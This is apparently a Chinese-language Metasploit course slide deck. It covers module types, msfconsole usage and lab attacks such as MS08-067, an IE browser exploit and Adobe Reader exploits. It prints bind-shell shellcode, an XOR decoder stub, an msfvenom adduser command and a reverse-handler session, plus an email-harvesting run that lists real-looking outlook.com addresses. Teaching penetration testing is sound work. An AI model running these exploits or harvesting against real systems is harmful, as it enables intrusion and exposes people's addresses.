<!doctype html>
<html lang="en">

<head>
	<meta charset="utf-8">

	<title>Markdown slide</title>

	<meta name="description" content="A framework for easily creating beautiful presentations using HTML">
	<meta name="author" content="Hakim El Hattab">

	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<link rel="stylesheet" href="libs/reveal.js/4.1.3/reset.css">
	<link rel="stylesheet" href="libs/reveal.js/4.1.3/reveal.css">

	
	
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

	  <!-- highlight Theme -->
  	
	  <link rel="stylesheet" href="libs/highlight.js/11.3.1/styles/monokai.min.css">
	
	
		
	<link rel="stylesheet" href="libs/reveal.js/4.1.3/plugin/chalkboard/style.css">
	
	
	
		<link rel="stylesheet" href="libs/reveal.js/4.1.3/plugin/customcontrols/style.css">
	
	<link rel="stylesheet" href="libs/styles/tasklist.css">



  <!-- Revealjs Theme -->
  
  	<link rel="stylesheet" href="libs/reveal.js/4.1.3/theme/beige.css" id="theme">
  
  


  <!-- Revealjs Theme -->
  

 
</head>

<body>
  


  <div class="reveal">

    <!-- Any section element inside of this container is displayed as a slide -->
    <div class="slides">

      


    
    <section>
        <section >
            <style type="text/css">
    p { text-align: left; }
    h2 { text-align: left; }
</style>
            </section>
        
            <section >
                <h1>MSF实践基础</h1>
<p>[Toc]</p>

            </section>
        

    </section>
    



    
        <section >
            
            <h2>1.MSF基本框架</h2>
<p><img src="./DR/MSF/arch.png" alt=""></p>
<p>Pro版支持web GUI.</p>

            </section>
    



    
    <section>
        <section >
            <h2>2.主要模块</h2>
<ul>
<li>模块（Module）
<ul>
<li><mark>模块</mark>是指Metasploit框架中所使用的一段软件代码组件。
<ul>
<li>渗透攻击模块（Exploit Modules）</li>
<li>辅助模块（Auxiliary Modules</li>
<li>攻击载荷（Payload Modules）</li>
<li>空字段模块（Nop Modules）</li>
<li>编码模块（Encoders）</li>
<li>后渗透攻击模块(Post)</li>
</ul>
</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <p>msfconsole启动界面</p>
<pre><code>
       =[ metasploit v4.14.5-dev                          ]
+ -- --=[ 1635 exploits - 935 auxiliary - 285 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

</code></pre>

            </section>
        
            <section >
                <ul>
<li>模块
<ul>
<li>源码目录：/usr/share/metasploit-framework/modules</li>
<li>Module: A standalone prepackaged piece of code that extends the functionality of the Metasploit Framework. A module can be an exploit, auxiliary or post-exploitation module. The module type determines its purpose. For example, any module that can open a shell on a target is considered an exploit module. A popular exploit module is MS08-067.</li>
</ul>
</li>
</ul>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h3>2.1 Auxiliary module</h3>
<p><mark>辅助模块</mark>
能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的<strong>情报信息</strong>，从而发起更具目标性的精准攻击。</p>

            </section>
        
            <section >
                <ul>
<li>Metasploit为渗透测试的信息搜集环节提供大量辅助模块支持
<ul>
<li>网络服务的扫描与查点</li>
<li>收集登录密码 口令猜测破解 敏感信息嗅探</li>
<li>探查敏感信息泄露、Fuzz测试发掘漏洞</li>
<li>实施网络协议欺骗等模块，</li>
<li>此外，还包含一些无需加载攻击载荷，同时往往不是取得目标系统远程控制权的渗透攻击，例如拒绝服务攻击等。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <p>Aux模块有很多，大家可以进到目录中去看</p>
<pre><code class="language-bash">root@KaliYL:/usr/share/metasploit-framework/modules/auxiliary# ls
admin    bnat    crawler  dos      gather
pdf      server   spoof  voip
analyze  client  docx     fuzzers  
parser  scanner  sniffer  sqli   vsploit

</code></pre>

            </section>
        
            <section >
                <p>简单试用一个</p>
<pre><code class="language-sh">msf auxiliary(ssh_version) &gt; info auxiliary/scanner/ssh/ssh_version
...查看下该模块如何用
msf auxiliary(ftp_login) &gt; use auxiliary/scanner/ssh/ssh_version 
msf auxiliary(ssh_version) &gt; show options
Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe

msf auxiliary(ssh_version) &gt; set RHOSTS 192.168.20.142/24
RHOSTS =&gt; 192.168.20.142/24
msf auxiliary(ssh_version) &gt; set THREADS 20
THREADS =&gt; 20
msf auxiliary(ssh_version) &gt; set TIMEOUT 1
TIMEOUT =&gt; 1
msf auxiliary(ssh_version) &gt; run

[*] Scanned  40 of 256 hosts (15% complete)
[*] Scanned  56 of 256 hosts (21% complete)
[*] 192.168.20.142:22     - SSH server version: SSH-2.0-OpenSSH_7.3p1 Debian-1
...
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) &gt; 

</code></pre>

            </section>
        
            <section >
                <p>邮箱搜集</p>
<pre><code class="language-sh">msf exploit(tftpdwin_long_filename) &gt; use auxiliary/gather/search_email_collector 
msf auxiliary(search_email_collector) &gt; show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN         outlook.com      yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  false            yes       Enable Google as a backend search engine
   SEARCH_YAHOO   false            yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) &gt; set SEARCH_GOOGLE true
SEARCH_GOOGLE =&gt; true
msf auxiliary(search_email_collector) &gt; set SEARCH_YAHOO ture
[-] The following options failed to validate: Value 'ture' is not valid for option 'SEARCH_YAHOO'.
SEARCH_YAHOO =&gt; false
msf auxiliary(search_email_collector) &gt; set SEARCH_YAHOO true
SEARCH_YAHOO =&gt; true
msf auxiliary(search_email_collector) &gt; run

[*] Harvesting emails .....
[*] Searching Google for email addresses from outlook.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from outlook.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from outlook.com
[*] Extracting emails from Yahoo search results...
[*] Located 22 email addresses for outlook.com
[*] 	a8l8ex@outlook.com
[*] 	chestexb5jvdr@outlook.com
[*] 	citysprintservice@outlook.com
[*] 	citysprintservices@outlook.com
[*] 	coolsalenew@outlook.com
[*] 	cooper-law-firm@outlook.com
[*] 	demiancreaciones@outlook.com
[*] 	dkxau@outlook.com
[*] 	example@outlook.com
[*] 	jasonwalker.11@outlook.com
[*] 	kasterke@outlook.com
[*] 	kingka0888@outlook.com
[*] 	laur9908@outlook.com
[*] 	livinggallery@outlook.com
[*] 	max.mustermann96@outlook.com
[*] 	nicequalitygoods@outlook.com
[*] 	rocketfiction@outlook.com
[*] 	shanedowling@outlook.com
[*] 	uncrypte@outlook.com
[*] 	videolibrarydvd@outlook.com
[*] 	xxx@outlook.com
[*] 	yourniceitems@outlook.com
[*] Auxiliary module execution completed

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h3>2.2 Exploit</h3>
<ul>
<li>渗透攻击（Exploit）
<ul>
<li>渗透攻击是指由攻击者或渗透测试者利用一个系统、应用或服务中的<mark>安全漏洞</mark>，所进行的攻击行为。
<ul>
<li>攻击者使用渗透攻击去入侵系统时，往往会造成开发者所没有预期到的一种特殊结果。</li>
<li>流行的渗透攻击技术包括缓冲区溢出、Web应用程序漏洞攻击（比如SQL注入），以及利用配置错误等</li>
</ul>
</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <ul>
<li></li>
</ul>
<pre><code>* Metasploit框架中渗透攻击模块可以按照所利用的安全漏洞所在的位置分为
	* 主动渗透攻击：攻击某个系统服务
	* 被动渗透攻击：攻击某个客户端应用
</code></pre>

            </section>
        
            <section >
                <p>exploit按目标平台分类，大家可以进入这些分类目录下查看exploit模块的数量、源码等：</p>
<pre><code class="language-sh">root@Kali:/usr/share/metasploit-framework/modules/exploits# ls
aix        bsdi     freebsd  linux      netware  unix
android    dialup   hpux     mainframe  osx      windows
apple_ios  firefox  irix     multi      solaris
root@Kali:/usr/share/metasploit-framework/modules/exploits# 

</code></pre>

            </section>
        
            <section >
                <pre><code class="language-sh">msf &gt; use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) &gt; show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h3>2.3 Payload</h3>
<ul>
<li>
<p>简单说payload原意指导‘载荷’，就是被运输的东西。在我们的上下文环境中就是指一段指令或称为shellcode。</p>
<ul>
<li>目标系统在被渗透攻击之后去执行的代码</li>
<li>例如，反弹式shell是一种从目标主机到攻击主机创建网络连接，并提供命令行shell的攻击载荷；</li>
<li>bind shell攻击载荷则在目标主机上将命令行shell绑定到一个打开的监听端口，攻击者可以连接这些端口来取得shell交互；</li>
<li>此外，攻击载荷也可能是简单地在目标操作系统上执行一些命令，如添加用户账户等。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <ul>
<li>Metasploit攻击载荷模块分为三种类型
<ul>
<li>独立（Singles）</li>
<li>传输器（Stager）+ 传输体（Stage）</li>
</ul>
</li>
</ul>
<p>–</p>
<ul>
<li>Singles
<ul>
<li>独立攻击载荷是完全自包含的，可直接独立地植入目标系统进行执行</li>
<li>比如“windows/shell_bind_tcp”是适用于Windows操作系统平台，能够将Shell控制会话绑定在指定TCP端口上的攻击载荷。</li>
</ul>
</li>
</ul>
<pre><code class="language-bash">.../modules/payloads/singles/windows# ls
adduser.rb                       meterpreter_reverse_tcp.rb
exec.rb                          powershell_bind_tcp.rb
format_all_drives.rb             powershell_reverse_tcp.rb
loadlibrary.rb                   shell_bind_tcp.rb
messagebox.rb                    shell_bind_tcp_xpfw.rb
meterpreter_reverse_https.rb     speak_pwned.rb
meterpreter_reverse_ipv6_tcp.rb  x64

</code></pre>

            </section>
        
            <section >
                <ul>
<li><code>windows/shell_bind_tcp</code>=<code>windows/shell/bind_tcp</code></li>
<li>传输体（Stage)</li>
</ul>
<pre><code>.../modules/payloads/stages/windows# ls
dllinject.rb    patchupdllinject.rb    shell.rb   vncinject.rb
meterpreter.rb  patchupmeterpreter.rb  upexec.rb  ...
</code></pre>
<ul>
<li>传输器（Stager)</li>
</ul>
<pre><code>.../modules/payloads/stagers/windows# ls
bind_tcp.rb                   reverse_tcp_dns.rb
reverse_http.rb               reverse_winhttps.rb
reverse_https_proxy.rb        ...
</code></pre>

            </section>
        
            <section >
                <p>为什么要将payload分成stager和stage呢？</p>
<ul>
<li>在一些比较特殊的渗透攻击场景中，可能会对攻击载荷的大小、运行条件有所限制，
<ul>
<li>比如特定安全漏洞利用时可填充攻击缓冲区的可用空间很小</li>
<li>Windows 7等新型操作系统所引入的NX（堆栈不可执行）、DEP（数据执行保护）等安全防御机制.</li>
</ul>
</li>
<li>传输器（Stager）和传输体（Stage）配对分阶段植入的技术
<ul>
<li>由渗透攻击模块首先植入代码精悍短小且非常可靠的传输器载荷</li>
<li>然后在运行传输器载荷时进一步下载传输体载荷并执行。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <p>Stager+Stage效果如何：</p>
<ul>
<li>目前Metasploit中的Windows传输器载荷可以绕过NX、DEP等安全防御机制，</li>
<li>可以兼容Windows 7操作系统，</li>
<li>而由传输器载荷进一步下载并执行的传输体载荷就不再受大小和安全防御机制的限制，可以加载如Meterpreter、VNC桌面控制等复杂的大型攻击载荷</li>
</ul>

            </section>
        
            <section >
                <p>与payload相关的几个概念：</p>
<ul>
<li>Shell: A console-like interface that provides you with access to a remote target.</li>
<li>Shellcode: The set of instructions that an exploit uses as the payload.</li>
<li>Bind shell payload: A shell that attaches a listener on the exploited system and waits for a connection to the listener.</li>
<li>Reverse Shell Payload: A shell that connects back to the attacking machine as a command prompt.</li>
</ul>

            </section>
        
            <section >
                <p>payload样例：<code>.../modules/payloads/singles/linux/shell_bind_tcp.rb</code></p>
<pre><code class="language-nasm">
	'Payload' =&gt;
            &quot;\x6a\x29&quot;                     + # pushq  $0x29
            &quot;\x58&quot;                         + # pop    %rax
            &quot;\x99&quot;                         + # cltd
            &quot;\x6a\x02&quot;                     + # pushq  $0x2
            &quot;\x5f&quot;                         + # pop    %rdi
            &quot;\x6a\x01&quot;                     + # pushq  $0x1
            &quot;\x5e&quot;                         + # pop    %rsi
            &quot;\x0f\x05&quot;                     + # syscall
            &quot;\x48\x97&quot;                     + # xchg   %rax,%rdi
           ...
            &quot;\x73\x68\x00&quot;                 + #
            &quot;\x53&quot;                         + # push   %rbx
            &quot;\x48\x89\xe7&quot;                 + # mov    %rsp,%rdi
            &quot;\x52&quot;                         + # push   %rdx
            &quot;\x57&quot;                         + # push   %rdi
            &quot;\x48\x89\xe6&quot;                 + # mov    %rsp,%rsi
            &quot;\x0f\x05&quot;                       # syscall
</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h3>2.4 Nops</h3>
<p>空指令（NOP）</p>
<ul>
<li>是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令，最典型的空指令就是空操作，在x86 CPU体系架构平台上的操作码是0x90。</li>
<li>在渗透攻击时，常常要在真正要执行的Shellcode之前添加一段空指令区，从而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode执行失败，提高渗透攻击的可靠性。</li>
<li>Metasploit框架中的空指令模块就是用来在攻击载荷中添加空指令区，以提高攻击可靠性的组件</li>
</ul>

            </section>
        
            <section >
                <pre><code class="language-sh">root@KaliYL:/usr/share/metasploit-framework/modules/nops/x86# more single_byte.rb 
class MetasploitModule &lt; Msf::Nop

SINGLE_BYTE_SLED =
  {
    # opcode  affected registers
    # ------  ------------------
    &quot;\x90&quot; =&gt; nil               , # nop
    &quot;\x97&quot; =&gt; [ 'eax', 'edi'   ], # xchg eax,edi
    &quot;\x96&quot; =&gt; [ 'eax', 'esi'   ], # xchg eax,esi
    &quot;\x95&quot; =&gt; [ 'eax', 'ebp'   ], # xchg eax,ebp
    &quot;\x93&quot; =&gt; [ 'eax', 'ebx'   ], # xchg eax,ebx
    &quot;\x92&quot; =&gt; [ 'eax', 'edx'   ], # xchg eax,edx
    &quot;\x91&quot; =&gt; [ 'eax', 'ecx'   ], # xchg eax,ecx
    &quot;\x99&quot; =&gt; [ 'edx'          ], # cdq
    &quot;\x4d&quot; =&gt; [ 'ebp'          ], # dec ebp
    &quot;\x48&quot; =&gt; [ 'eax'          ], # dec eax
    &quot;\x47&quot; =&gt; [ 'edi'          ], # inc edi
    &quot;\x4f&quot; =&gt; [ 'edi'          ], # dec edi
    &quot;\x40&quot; =&gt; [ 'eax'          ], # inc eax
...

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h3>2.5 Encoder</h3>
<ul>
<li>
<p>编码：攻击载荷模块与空指令模块组装完成一个指令序列后进行。</p>
<ul>
<li>编码器模块的第一个使命是确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”</li>
<li>编码器的第二个使命是改变特征码，对攻击载荷进行“免杀”处理</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <ul>
<li>典型的“坏字符”就是0x00空字节
<ul>
<li>在大量漏洞所在的字符串操作函数中，空字节会被解释为字符串的末尾，这样会将后面内容进行截断，从而使得攻击载荷没有完整地被运行，导致攻击失败。</li>
<li>此外还有一些渗透攻击场景中，网络输入必须通过明文协议进行传输，从而需要攻击载荷的内容都是可打印字符，甚至于字母与数字字符，这时除了这些可接受字符之外的全部字符，对这个渗透攻击场景而言，就全落入了“坏字符”的范畴了。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <ul>
<li>每个渗透攻击模块根据它的漏洞利用条件与执行流程会有多个不同的“坏字符”，渗透代码开发者需要进行测试并将它们标识出来，在Metasploit的渗透攻击模块中存在一个BadChars字段，专门用来列出需要避免的“坏字符”列表，让Metasploit选择编码器对攻击载荷进行编码时能够绕开这些“令人崩溃”的家伙们。</li>
</ul>

            </section>
        
            <section >
                <ul>
<li>
<p>目录：/usr/share/metasploit-framework/modules/encoders</p>
</li>
<li>
<p>一个最简单的编码器/usr/share/metasploit-framework/modules/encoders/x64/xor.rb。</p>
<ul>
<li>这个代码相当于生成编码后的payload，其继承了Msf::Encoder::Xor这个类，</li>
<li>Msf::Encoder::Xor实现了具体的编码过程</li>
<li>对应实现文件是<code>/usr/share/metasploit-framework/lib/msf/core/encoder/xor.rb</code>。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <pre><code class="language-ruby">...
  def decoder_stub( state )

    # calculate the (negative) block count . We should check this against state.badchars.
    block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( &quot;V&quot; )

    decoder =   &quot;\x48\x31\xC9&quot; +                 # xor rcx, rcx //置0 rcx
          &quot;\x48\x81\xE9&quot; + block_count +   # sub ecx, block_count //block_count4字节
          &quot;\x48\x8D\x05\xEF\xFF\xFF\xFF&quot; + # lea rax, [rel 0x0] //把这段指令的首地址放到rax中
          &quot;\x48\xBBXXXXXXXX&quot; +             # mov rbx, 0x???????????????? //随便选择一个8字节的key
          &quot;\x48\x31\x58\x27&quot; +             # xor [rax+0x27], rbx //这段stub是0x27个字节，所以rax+0x27是原payload的首地址
          &quot;\x48\x2D\xF8\xFF\xFF\xFF&quot; +     # sub rax, -8 //rax+8，不明白为何这样写
          &quot;\xE2\xF4&quot;                       # loop 0x1B //循环

    state.decoder_key_offset = decoder.index( 'XXXXXXXX' )

    return decoder
...
				           
</code></pre>

            </section>
        
            <section >
                <p>其应用原理如下：</p>
<p><img src="./DR/MSF/encoder.jpg" alt=""></p>

            </section>
        
            <section >
                <p>用编码器去除坏字符的例子：</p>
<pre><code class="language-sh">sf &gt; use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) &gt; set payload windows/shell/bind_tcp
payload =&gt; windows/shell/bind_tcp
msf exploit(ms08_067_netapi) &gt; set encoder x86/xor
encoder =&gt; x86/xor
msf exploit(ms08_067_netapi) &gt; set badchar \x00
badchar =&gt; x00
msf exploit(ms08_067_netapi) &gt; 

</code></pre>
<pre><code class="language-sh">msfvenom -p linux/x86/adduser -b \x00 LHOST=192.168.20.141 LPORT=4444 -f perl
</code></pre>
<ul>
<li><a href="https://www.offensive-security.com/metasploit-unleashed/generating-payloads/">点击查看更多实例</a></li>
</ul>

            </section>
        
            <section >
                <h3>2.6 Post</h3>
<p>Post-exploitation module: A module that enables you to gather more information or to gain further access to an exploited target system.</p>
<pre><code class="language-sh">meterpreter &gt; info post/windows/gather/checkvm 
...
meterpreter &gt; run post/windows/gather/checkvm 

[*] Checking if YLWIN-PC is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter &gt; 

</code></pre>

            </section>
        
            <section >
                <pre><code class="language-sh">.../modules/post/windows# ls -R
.:
capture  escalate  gather  manage  recon  wlan

./capture:
keylog_recorder.rb  lockout_keylogger.rb

./escalate:
droplnk.rb    golden_ticket.rb       screen_unlock.rb
getsystem.rb  ms10_073_kbdlayout.rb
...

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>3 用户操作界面</h2>
<ul>
<li>msfconsole
<ul>
<li>开发部署成本低、兼容性高、方便自动化</li>
<li>指令需要记</li>
</ul>
</li>
<li>armitage
<ul>
<li>点选模块 不用记忆</li>
<li>使用不灵活</li>
</ul>
</li>
<li>webgui
<ul>
<li>跨平台 高效 功能强大</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <p>自行化的一个例子</p>
<pre><code>root@KaliYL:/var/lib/veil-evasion/output/handlers# ls
m_rev_http_handler.rc  payload5_handler.rc  rm4444.exe_handler.rc
payload1_handler.rc    payload6_handler.rc
root@KaliYL:/var/lib/veil-evasion/output/handlers# msfconsole -c rm4444.exe_handler.rc 

</code></pre>

            </section>
        
            <section >
                <h3>3.1 msfconsole</h3>
<ul>
<li>操作的目的
<ul>
<li>泛泛的操作：查找所需模块 浏览、猜测模块作用
<ul>
<li>search show</li>
</ul>
</li>
<li>有明确目标的操作：查看模块说明、参数、适用目标、效果、漏洞说明
<ul>
<li>info show</li>
</ul>
</li>
<li>攻击测试：实践验证
<ul>
<li>use set exploit run</li>
</ul>
</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <h4>3.1.1 基本指令</h4>
<p><strong>show [exploits|auxiliary|post|payloads|encoders|nops]</strong></p>
<p><strong>[options] [target]</strong></p>
<p>相当于列出相关信息</p>

            </section>
        
            <section >
                <pre><code class="language-sh">msf &gt; show nops

NOP Generators
==============

   Name             Disclosure Date  Rank    Description
   ----             ---------------  ----    -----------
   armle/simple                      normal  Simple
   mipsbe/better                     normal  Better
   php/generic                       normal  PHP Nop Generator
   ppc/simple                        normal  Simple
   sparc/random                      normal  SPARC NOP Generator
   tty/generic                       normal  TTY Nop Generator
   x64/simple                        normal  Simple
   x86/opty2                         normal  Opty2
   x86/single_byte                   normal  Single Byte

msf &gt; 

</code></pre>

            </section>
        
            <section >
                <p><strong>search 任意字符串</strong>，在所有模块中查找包含该字符串的模块名</p>
<pre><code class="language-sh">msf &gt; help search
  会显示search的用法，下面是一个例子
msf &gt; search ms16 type:exploit platform:windows
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   auxiliary/gather/ie_sandbox_findfiles                          2016-08-09       normal     Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
   auxiliary/server/netbios_spoof_nat                             2016-06-14       normal     NetBIOS Response &quot;BadTunnel&quot; Brute Force Spoof (NAT Tunnel)
   exploit/windows/browser/ms16_051_vbscript                      2016-05-10       normal     Internet Explorer 11 VBScript Engine Memory Corruption
   exploit/windows/fileformat/office_ole_multiple_dll_hijack      2015-12-08       normal     Office OLE Multiple DLL Side Loading Vulnerabilities
   exploit/windows/local/ms16_016_webdav                          2016-02-09       excellent  MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal     MS16-032 Secondary Logon Handle Privilege Escalation



</code></pre>

            </section>
        
            <section >
                <ul>
<li>每个攻击模块源码中都会列出可攻击目标“Targets”</li>
<li>我们可以用<strong>grep</strong> 搜索exploit模块目录，找到攻击特定目标系统的exploit模块</li>
</ul>
<pre><code class="language-sh"># more ms16_051_vbscript.rb 
...
      'Targets'        =&gt;
        [
          [ 'Automatic', {} ],
          [ 'Windows 10 with IE 11', { } ]
        ],
...

root@KaliYL:# cd /usr/share/metasploit-framework/modules/exploits/windows
root@KaliYL:# grep Windows\ 7 ./*/*
./browser/adobe_cooltype_sing.rb:          # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd
./browser/adobe_flash_avm2.rb:        SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
./browser/adobe_flash_casi32_int_overflow.rb:        on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.
./browser/adobe_flash_copy_pixels_to_byte_array.rb:        * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125.
...

</code></pre>

            </section>
        
            <section >
                <ul>
<li>“info 模块路径/模块名”，显示模块的说明信息，一般在使用前需要看一下。</li>
</ul>
<pre><code>
msf auxiliary(ssh_version) &gt; info nop/x64/simple 

       Name: Simple
     Module: nop/x64/simple
   Platform: All
       Arch: x64
       Rank: Normal

Provided by:
  sf &lt;stephen_fewer@harmonysecurity.com&gt;

Description:
  An x64 single/multi byte NOP instruction generator.

</code></pre>

            </section>
        
            <section >
                <h3>3.2 Armitage</h3>
<p>用如下指令启动即可，然后点击&quot;connect&quot;&quot;yes&quot;即可。</p>
<pre><code>root@KaliYL:~# service postgresql start
root@KaliYL:~# armitage

</code></pre>
<p>–</p>
<h3>3.3 Web GUI</h3>
<p>Metaspliot_Pro中带有，更方便、直观、高效。</p>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>4 测试案例</h2>
<ul>
<li>四种典型的攻击方式
<ul>
<li>直接攻击系统开启的漏洞服务，获取系统控制权</li>
<li>攻击浏览器，获取系统控制权</li>
<li>攻击客户端应用，获取系统控制权</li>
<li>本地提权</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <h3>4.1 主动攻击</h3>
<pre><code>攻击机：Kali 靶机：Win2k_Server_SP0
exploit:exploit/windows/smb/ms08_067_netapi
msf&gt; search;use; show/set options;check; set payload; exploit;
</code></pre>
<p><a href="http://www.freebuf.com/vuls/130531.html">IIS 6.0曝远程代码执行漏洞CVE-2017-7269</a></p>

            </section>
        
            <section >
                <h3>4.2 攻击浏览器</h3>
<pre><code class="language-sh">msf exploit(ie_setmousecapture_uaf) &gt; use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) &gt; info 
msf exploit(ie_setmousecapture_uaf) &gt; 设置参数 payload options
心里默默地预期一下效果
msf exploit(ie_setmousecapture_uaf) &gt; exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.20.237:4444 
[*] Using URL: http://192.168.20.237:8080/3dqxm7tPi
[*] Server started.
等着鱼儿上勾
自动攻击：msf&gt; use auxiliray/server/browser_autopwn
</code></pre>

            </section>
        
            <section >
                <blockquote>
<p>我们使用了微软Edge浏览器内部的JavaScript引擎漏洞实现了在Edge沙箱内的任意代码执行，同时我们使用了Win10内核的漏洞，逃离了沙箱并完全控制了虚拟机。”360安全战队负责人郑文彬在邮件中写道。“之后我们利用了VMware的硬件模拟漏洞实现了从控制虚拟机的系统权限到控制宿主机的系统权限。这所有的攻击只要一个网页就能完成。
– pwn2own 2017</p>
</blockquote>

            </section>
        
            <section >
                <h3>4.3 攻击客户端应用</h3>
<p>攻击Adobe Reader，或office。</p>
<pre><code class="language-sh">msf exploit(ie_setmousecapture_uaf) &gt; use exploit/windows/fileformat/adobe_cooltype_sing 
msf exploit(adobe_cooltype_sing) &gt; info
msf exploit(adobe_cooltype_sing) &gt; search type:exploit  name:Excel platform:windows

Matching Modules
================

   Name                                                  Disclosure Date  Rank    Description
   ----                                                  ---------------  ----    -----------
   exploit/windows/fileformat/ms09_067_excel_featheader  2009-11-10       good    MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability
   exploit/windows/fileformat/ms10_038_excel_obj_bof     2010-06-08       normal  MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow
   exploit/windows/fileformat/ms11_021_xlb_bof           2011-08-09       normal  MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow


</code></pre>

            </section>
        
            <section >
                <blockquote>
<p>比赛中，360安全战队使用了Adobe Reader漏洞和Windows 10漏洞的“组合拳”攻击：首先利用Adobe Reader漏洞实现远程代码执行，再利用Win10系统的内核漏洞突破Adobe沙箱堡垒，在比赛中只要打开一个PDF文件就能成功控制电脑。赢得Adobe Reader项目最高级别的5万美元和6个积分奖励。
– pwn2own 2017</p>
</blockquote>

            </section>
        
            <section >
                <h3>4.4 本地提权</h3>
<pre><code>root@KaliYL:/usr/share/metasploit-framework/modules/exploits/windows/local# ls
adobe_sandbox_adobecollabsync.rb  ms15_051_client_copy_image.rb
agnitum_outpost_acs.rb            ms15_078_atmfd_bof.rb
always_install_elevated.rb        ms16_016_webdav.rb
applocker_bypass.rb               ms16_032_secondary_logon_handle_privesc.rb
ask.rb                            ms_ndproxy.rb
bthpan.rb                         novell_client_nicm.rb
bypassuac_eventvwr.rb             novell_client_nwfs.rb
...

</code></pre>
<p><a href="http://www.freebuf.com/vuls/95950.html">“WebDAV”提权漏洞介绍（MS16-016）</a></p>

            </section>
        

    </section>
    



    
        <section >
            
            <h1>具体实践过程</h1>
<p><a href="http://www.cnblogs.com/crazymosquito/p/8965059.html">http://www.cnblogs.com/crazymosquito/p/8965059.html</a>
<a href="http://www.cnblogs.com/dky20155212/p/8978385.html">http://www.cnblogs.com/dky20155212/p/8978385.html</a>
<a href="http://www.cnblogs.com/20145319zk/p/6690787.html">http://www.cnblogs.com/20145319zk/p/6690787.html</a></p>
<h1>参考文献</h1>
<ol>
<li><a href="https://help.rapid7.com/metasploit/Content/getting-started/gsg-pro.html#">rapid7官网说明</a></li>
<li><a href="https://www.offensive-security.com/metasploit-unleashed/">msf使用手册</a></li>
<li></li>
</ol>

            </section>
    


    </div>


  </div>

  	
	<script src="libs/reveal.js/4.1.3/reveal.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/zoom/zoom.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/notes/notes.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/search/search.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/markdown/markdown.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/highlight/highlight.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/menu/menu.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/math/math.js"></script>

	<script src="libs/reveal.js/4.1.3/plugin/fullscreen/plugin.js"></script>
  
  	<script src="libs/reveal.js/4.1.3/plugin/animate/plugin.js"></script>
  	<script src="libs/reveal.js/4.1.3/plugin/animate/svg.min.js"></script>
  
